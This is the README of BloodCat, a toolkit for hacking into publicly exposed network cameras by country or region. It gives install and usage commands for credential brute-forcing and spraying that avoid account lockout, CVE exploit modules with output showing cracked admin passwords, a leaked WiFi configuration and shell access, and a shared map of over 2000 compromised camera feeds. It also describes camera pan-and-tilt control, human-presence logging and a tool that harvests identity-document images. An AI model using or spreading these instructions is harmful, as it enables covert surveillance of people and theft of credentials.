💻 We are currently collecting reviews of Bloodcat as well as tutorial videos in various languages. You only need to post relevant videos or operational content; our bot will automatically search, gather, and process them from Google, then organize them on the corresponding page.
___
(___)
____
_\___ \ |\_/|
\ \ \/ , , \ ___
\__ \ \ ="= //|||\
|=== \/____)_)||||
\______| | |||||
_/_| | | =====
(_/ \_)_)
A tool for hacking into publicly exposed network cameras, with support for specifying country and region.
PS: This tool supports weak‑credential and brute‑force testing against most mainstream network camera models. However, some devices with enhanced security mechanisms deliberately obfuscate or conceal their fingerprinting characteristics, which means the tool is not universally effective. Future updates will progressively introduce additional camera‑related CVE‑based vulnerability detection plugins, aiming to improve success rates while reducing unnecessary probing traffic.
🐈⬛ Have you ever wondered whether there are publicly accessible cameras watching the streets you walk every day? Once you become aware of their existence, you may realize how close and real online exposure actually is.
🤦♂️ Are you still struggling with the lack of practical tools for exploiting IP camera vulnerabilities?
🌏 BloodCat officially provides over 🔥2000+🔥 publicly accessible IP camera examples worldwide.
🎥 A comprehensive IP Camera penetration testing toolkit, featuring default credential enumeration, CVE exploitation, and additional capabilities — with support for collaborative team usage.
🛡️ BloodCat does not collect any identity-related information.
💻 BloodCat is compatible with Windows, Linux, and macOS.
 |
 |
 |
 |
 |
 |
 |
 |
 |
 |
- Video
- Install
- Bloodcat Workflow
- Bloodcat
- Bloodcat Digger
- Bloodcat PTZ
- Evil bat
- Shodan cat
- PicThief
- Bloodcat CVE
- Bloodcat Global Map
- Bloodcat Global Map Terminal
- Bloodcat Lan Map
- Bloodcat Editor
- Bloodcat Nmap (Run immediately)
- Bloodcat Tricks
Disk space requirement: Available space > 700 MB
$ sudo apt update && sudo apt install build-essential python3-dev python3-pyqt5.qtwebengine -y
$ git clone https://github.com/MartinxMax/BloodCat.git
$ cd BloodCat && python3 -m venv bloodcat
$ source ./bloodcat/bin/activate
(bloodcat)$ python -m pip install --upgrade pip
(bloodcat)$ pip install opencv-python aiohappyeyeballs aiohttp aiosignal async-timeout attrs certifi charset-normalizer frozenlist geoip2 idna maxminddb multidict propcache pycryptodome PyQt5 PyQt5-Qt5 PyQt5_sip PyQtWebEngine PyQtWebEngine-Qt5 requests typing_extensions urllib3 yarl numpy pynput
You only need to provide the IP and port in the format IP:PORT.
The program will automatically detect whether the target is a private or public IP address and store the results in separate locations accordingly.
About:
- Integrates with search engines, enabling target filtering and continuous scanning operations by country, region, or city.
- Operates at the RTSP protocol, providing high stealth and efficiency.
- Performs camera fingerprint identification first, automatically filtering out and excluding honeypot systems, then enumerates usernames and passwords of target network cameras.
- Supports password spraying, applicable to single IPs or multiple IP ranges.
- Supports bc data updating and merging, facilitating long-term maintenance and management.
- Supports writing Hikvision camera credential header information into bc files, which can be visualized on a map.
Scanner I recommend: https://github.com/MartinxMax/n1ght0wl.git
After BloodCat successfully gains access to a camera, it will provide you with a playback link. However, you don’t need to open the link manually.
Simply reload the module in BloodCat-Map, then use the IP search in the top-right corner to locate the target. Click the target, and the video will play directly.
(bloodcat)$ python3 bloodcat.py -husage: bloodcat.py [-h] [--country COUNTRY] [--city CITY] [--region REGION] [--key KEY] [--ip IP] [--ips IPS] [--password PASSWORD] [--merge] [--hiv HIV] [--live LIVE] [--update]
[--scan]
Blood Cat - IP Camera Weak Credential Scanner
options:
-h, --help show this help message and exit
--country COUNTRY Country
--city CITY City
--region REGION Area
--key KEY Fofa API key
--ip IP IP:PORT or IP
--ips IPS Targets list file (each line: IP or IP:PORT)
--password PASSWORD Password spraying
--merge Merge and update all data in ./data into a single BC file
--hiv HIV Load Hikvision credentials file
--live LIVE Filter currently active cameras in the BC file
--update Check for the latest version and update
--scan Scan ports when RTSP port is unknown
If you don’t know the target RTSP port, you can add the --scan option to automatically scan ports on the target.
(bloodcat)$ python3 bloodcat.py --ip "185.153.118.100" --scanIf the --scan option is not used, you must specify the port.
(bloodcat)$ python3 bloodcat.py --ip "185.153.118.100:554"
You can also use the --scan option here.
(bloodcat)$ python3 bloodcat.py --ips target.txt
(bloodcat)$ python3 bloodcat.py --country CN --region HK --key <FOFA-API-KEY>
Place all .bc files that need to be merged into the ./data/ directory.
(bloodcat)$ python3 bloodcat.py --merge
After execution,
./data/20260308_012011.bc will be a deduplicated and merged .bc file.
Replace the original global.bc file, then right-click Reload in BloodCat_Map:
(bloodcat)$ mv ./data/20260308_012011.bc ./data/global.bc(bloodcat)$ python3 bloodcat.py --live ./data/global.bc
live_20260308_012137.bc
(bloodcat)$ python3 bloodcat.py --update
(bloodcat)$ python3 bloodcat_cve.py
Bloodcat@exp# showMatching Modules
==============================================================================
ID Name Description
------------------------------------------------------------------------------
1 hikvision/cve-2017-7921 Hikvision auth bypass
2 liandian/cve-2025-7503 Liandian IP Camera Telnet Hardcoded Credentials & Plaintext WiFi Credentials Leak
You can use the Bloodcat main program to test credentials on Hikvision cameras.
Under normal circumstances, when authentication attempts are made through the HTTP authentication interface, the device will trigger an account lockout mechanism after more than five consecutive failed login attempts, resulting in the admin account being locked.
The Bloodcat main program does not rely on the standard HTTP authentication process, and therefore does not trigger the account lockout policy.
If credential-based access cannot be obtained, you may proceed with the CVE module for further validation and analysis.
iVMS-4200 download link : https://github.com/MartinxMax/BloodCat/releases/tag/play
Bloodcat@exp# use 1
Bloodcat@(CVE-2017-7921)# showParameter | Value | Description
----------------------------------------------------------------------
ips | | Hosts file (<IP>:<Port>)
threads | 10 | Thread count
output_type | csv | json / csv
output_path | ./result.csv| Output file
Bloodcat@(CVE-2017-7921)# set ips /home/maptnh/Desktop/2/bloodcat/BloodCat/tar.txt
Bloodcat@(CVE-2017-7921)# runBloodcat@(CVE-2017-7921)# run
[*] Successfully read 3 valid targets
[*] Start cracking (3 targets, threads=10)
[+] Crack success X.X.X.X:80 => admin:dddddd
[!] 1.59.71.189:80 Request timeout (> 3 seconds)
[+] Crack success X.X.X.X:80 => admin:xxxxx
[*] Start scanning SDK ports (Range: 8000-8100)...
[SDK Crack Success] X.X.X.X:8000
[SDK Crack Success] X.X.X.X:8000
[*] JSON exported successfully: ./result.csv (Size: 362 bytes, Number of devices: 2)
[*] Done! Exported 2 devices in total
Bloodcat@exp# use 2
Bloodcat@(CVE-2025-7503)# showParameter | Value | Description
----------------------------------------------------------------------
ip | | ip address
port | 23 | telnet port
timeout | 10 | timeoutBloodcat@(CVE-2025-7503)# set ip X.X.X.X
Bloodcat@(CVE-2025-7503)# run[+] Sending payload to X.X.X.X:23 ...
_ (`-. (`\ .-') /` .-') _ ('-. _ .-') _
( (OO ) `.( OO ),' ( OO ) )_( OO)( ( OO) )
_.` \,--./ .--. ,--./ ,--,'(,------.\ .'_
(__...--''| | | | \ | |\ | .---',`'--..._)
| / | || | | |, | \| | )| | | | \ '
| |_.' || |.'.| |_)| . |/(| '--. | | ' |
| .___.'| | | |\ | | .--' | | / :
| | | ,'. | | | \ | | `---.| '--' /
`--' '--' '--' `--' `--' `------'`-------'
cat /tmp/wificonf/wpa_supplicant.conf
ctrl_interface=/var/run/wpa_supplicant
update_config=1
V380-linux# whoami
whoami
ls -la
-sh: whoami: not found
V380-linux# ls -la
drwxr-xr-x 19 1000 root 218 Jan 8 2022 .
drwxr-xr-x 19 1000 root 218 Jan 8 2022 ..
drwxr-xr-x 2 1000 root 813 Feb 15 2022 bin
drwxrwxrwt 4 root root 2680 Jan 1 1970 dev
drwxr-xr-x 7 1000 root 350 Feb 12 2022 etc
drwxr-xr-x 3 1000 root 30 Jan 13 2022 ext
drwxr-xr-x 2 1000 root 3 Sep 9 2011 home
lrwxrwxrwx 1 root root 9 Jan 8 2022 init -> sbin/init
drwxr-xr-x 3 1000 root 773 Jan 7 2022 lib
drwxr-xr-x 5 1000 root 52 Jan 4 2022 mnt
drwxr-xr-x 7 1000 1000 83 Aug 18 2022 mvs
drwxr-xr-x 2 1000 root 3 Oct 17 2011 opt
dr-xr-xr-x 62 root root 0 Jan 1 1970 proc
drwxr-xr-x 2 1000 root 3 Sep 9 2011 root
drwxr-xr-x 2 1000 root 433 Jan 21 2022 sbin
drwxr-xr-x 2 1000 root 3 Sep 9 2011 srv
dr-xr-xr-x 11 root root 0 Jan 1 1970 sys
drwxrwxrwt 3 root root 140 Feb 7 13:49 tmp
drwxr-xr-x 6 1000 root 65 Jan 18 2022 usr
drwxrwxrwt 6 root root 120 Jan 1 1970 varhttps://github.com/MartinxMax/evil-b4t
Evil‑Bat is a real‑time human detection and activity logging tool based on remote network cameras.
It analyzes RTSP video streams to identify the presence of living humans and automatically records key moments when people appear in the camera view.
If you don’t have a Shodan membership, this tool helps you maximize the number of IP addresses you can retrieve from Shodan.
https://github.com/MartinxMax/shodancat
This is a tool built on Flask API, OCR (optical character recognition), and YOLO-based intelligent detection, designed to identify images that may contain potentially leaked identity credentials.
The client enables sorting and organizing of images containing sensitive identity credentials without the need for any dependency installation.
The server exposes an open identification API interface to intelligently detect potential identity credentials.
https://github.com/MartinxMax/PicThief
(bloodcat)$ python3 bloodcat_map.py
If an error occurs
QObject::moveToThread: Current thread (0x22f43020) is not the object's thread (0x23190c60).
Cannot move to target thread (0x22f43020)
qt.qpa.plugin: Could not load the Qt platform plugin "xcb" in "/home/test/Desktop/BloodCat/bloodcat/lib/python3.12/site-packages/cv2/qt/plugins" even though it was found.
This application failed to start because no Qt platform plugin could be initialized. Reinstalling the application may fix this problem.
Available platform plugins are: xcb, eglfs, linuxfb, minimal, minimalegl, offscreen, vnc, wayland-egl, wayland, wayland-xcomposite-egl, wayland-xcomposite-glx, webgl.
Aborted (core dumped)Restart the program after running the following command.
(bloodcat)$ python3 -c "import cv2,os; p=os.path.join(os.path.dirname(cv2.__file__),'qt','plugins','platforms'); print(p) if os.path.exists(p) else exit(0)" | xargs -r rm -rfBy entering a remote data URL(BloodCat Map API), you can load external datasets.
You can test it using the official BloodCat database:
https://raw.githubusercontent.com/MartinxMax/db/refs/heads/main/blood_cat/global.bc
Note: For your own anonymity, do not import or use untrusted BloodCat Map API endpoints, as they may collect your IP address (unless you are using a proxy).
You can also copy API database links from other BloodCat-Map instances:
The target data will be loaded and displayed on the map. If you need to remove an entry, click the X on the right side. Remote-loaded raw data is not automatically saved locally, but the remote URL will be written into the configuration file.
You can enter keywords here to perform fuzzy matching on targets. This allows you to quickly lock and track specific targets on the map.
To use the chat feature, all team members must: · Be on the same local network (LAN) · Run BloodCat-Map simultaneously
The good news is: · No need to enter peer IP addresses · No need to worry about sniffing attacks · Chat packets are encrypted
(192.168.0.2)$ python3 bloodcat_map.py(192.168.0.3)$ python3 bloodcat_map.py
(bloodcat)$ python ./bloodcat_map_terminal.py
Here’s a useful trick: if you’re using Termux, after setting up the BloodCat environment on one host machine, you can use the socat command to forward the surveillance stream to another host that doesn’t have BloodCat installed.
(bloodcat)$ sudo apt install socat
(bloodcat)$ socat TCP-LISTEN:9999,fork,reuseaddr EXEC:"python ./bloodcat_map_terminal.py"
(Termux)$ pkg install netcat-openbsd -y
(Termux)$ nc 192.168.67.131 9999
BloodCatMap-Terminal# help
=== BloodCat Map Terminal - Help Manual ===
Commands:
help - Show this help message
show - Show all entries with detailed fields (global ID)
show brief - Show brief list (global ID, IP, Source)
search <keyword> - Search entries (supports: IP, RTSP, ASN, sys_org, network)
play <global_id> - Play RTSP stream by GLOBAL ID
info <global_id> - Show detailed information by GLOBAL ID
reload - Reload all data (local + remote)
reset - Reset filter to show all entries
add <url> - Add remote DB URL to config
remove <url> - Remove remote DB URL from config
urls - List all configured remote URLs
exit/quit - Exit the consoleBloodCatMap-Terminal# search x.x.x.x
BloodCatMap-Terminal# play 1226
Note: This Nmap version only supports detecting anonymous public cameras and cannot brute‑force camera account passwords. The good news is that you don’t need to install most of BloodCat’s core dependencies to perform the detection.
$ sudo apt install nmap ffmpeg -y
ip=<Target_X.X.X.X>; nmap -Pn -p "$(curl -s https://raw.githubusercontent.com/MartinxMax/BloodCat/refs/heads/main/TOP1000_RTSP_Port.txt | grep -oE '[0-9]+' | sort -n | uniq | paste -sd,)" --script <(curl -s https://raw.githubusercontent.com/MartinxMax/BloodCat/refs/heads/main/bloodcat.nse) $ip
ips=<File_Name>; nmap -Pn -p "$(curl -s https://raw.githubusercontent.com/MartinxMax/BloodCat/refs/heads/main/TOP1000_RTSP_Port.txt | grep -oE '[0-9]+' | sort -n | uniq | paste -sd,)" --script <(curl -s https://raw.githubusercontent.com/MartinxMax/BloodCat/refs/heads/main/bloodcat.nse) -iL $ips
$ ffplay -fs -rtsp_transport tcp rtsp://admin:123456@x.x.x.x:554/1
After importing a CSV or BC configuration file, you can: 1.Filter targets by specific country/region 2.Perform fuzzy matching on fields (e.g. country, keyword, etc.) 3.Re-export only the matched/selected targets 4.Visualize all target cameras directly on a world map using geolocation data
(bloodcat)$ python3 bloodcat_editor.py
Click Import CSV configuration file.
View the geographic locations of all Hikvision cameras on the map.
For example, searching “Japan” in the country field will display all related entries. All matched items can be auto-selected, then export only the checked targets.
Finally, use iVMS-4200 to play the exported devices.
Download link : https://github.com/MartinxMax/BloodCat/releases/tag/play
After successfully brute-forcing a single target with Bloodcat, multiple camera channels may exist on the target device.Use Digger to deeply discover and enumerate all available camera streams.
(bloodcat)$ python3 bloodcat_digger.py
(bloodcat)$ python3 bloodcat_digger.py --rtsp rtsp://admin:xxxxx@172.16.17.103:554/Streaming/Channels/ --id 101Scan starting from ID 101 (the default initial channel ID for most cameras):
This tool uses a stable TCP connection to the target.(FFplay uses UDP by default, which is extremely unstable for camera streams)
$ ffplay -x 600 -y 300 -rtsp_transport tcp rtsp://admin:xxxxx@172.16.17.103:554/Streaming/Channels/<x>01
You can use this program to detect whether a target camera can be controlled.
(bloodcat)$ python3 bloodcat_ptz.py --help
Scan ONVIF ports
(bloodcat)$ python3 bloodcat_ptz.py --scan <Target>
Start Bloodcat Map and open the camera stream
(bloodcat)$ python3 bloodcat_ptz.py --ip <ip> --port <ONVIF_PORT> --username <username> --password <password>
After successful authentication, you can control the camera direction using the numeric keypad.
(bloodcat)$ python3 bloodcat.py --ips ./B-172-554.txt
(bloodcat)$ python3 bloodcat_map_lan.py
